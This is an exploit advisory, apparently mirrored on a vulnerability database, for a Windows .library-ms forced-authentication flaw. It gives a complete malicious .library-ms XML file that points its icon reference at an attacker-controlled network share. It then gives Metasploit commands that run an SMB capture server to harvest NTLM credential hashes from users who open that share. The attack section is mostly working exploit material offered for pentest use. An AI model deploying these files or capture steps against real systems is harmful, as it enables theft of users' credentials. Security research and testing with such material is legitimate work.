Vulners
Lucene search
Microsoft Windows #MicrosoftWindows .library-ms Information Disclosure Vulnerability
[+] Credits: John Page (aka hyp3rlinx)
Vendor
================
www.microsoft.com
File format
============
".library-ms" File Type
Operating system file introduced with Microsoft Windows 7, appears as a subfolder within the Libraries folder in the left side panel of the Windows Explorer
and includes references to one or more folders that can be browsed when the library is opened.
Library description files are XML files that define libraries. Libraries aggregate items from local and remote storage locations into a single
view in Windows Explorer. Library description files follow the Library Description schema and are saved as *.library-ms files.
Vulnerability Type
===================
Information Disclosure
Security Issue
================
.library-ms filetype triggers forced authentication when a user/client accesses a remote share that houses an attacker supplied ".library-ms" file, disclosing
credential hashes and other identifiable computer informations.
This is already a well known issue and therefore is just another attack vector that can be used on a pentest etc.
Exploit/POC
=============
1) Create "test.library-ms" using a ATTACKER-IP / Unknown host for the "iconReference" XML Node and place on Network share.
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@shell32.dll,-34575</name>
<ownerSID>S-1-5-21-372074477-2495183225-776587326-1000</ownerSID>
<version>1</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>\\blahblahblahblahblah\poc\,-1002</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription publisher="Microsoft" product="Windows">
<description>@shell32.dll,-34577</description>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<simpleLocation>
<url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
<serialized>MBAAAEAFCAAA...MFNVAAAAAA</serialized>
</simpleLocation>
</searchConnectorDescription>
<searchConnectorDescription publisher="Microsoft" product="Windows">
<description>@shell32.dll,-34579</description>
<isDefaultNonOwnerSaveLocation>true</isDefaultNonOwnerSaveLocation>
<simpleLocation>
<url>knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634}</url>
<serialized>MBAAAEAFCAAA...HJIfK9AAAAAA</serialized>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
2) Using smb capture from Kali
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/hashes.txt
JOHNPWFILE = /tmp/hashes.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job
[*] Server started.
msf auxiliary(smb)
3) Access the Network share containing the "test.library-ms" Windows file type.
# 0day.today [2018-07-17] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2018 00:00Current
7.5High risk
Vulners AI Score7.5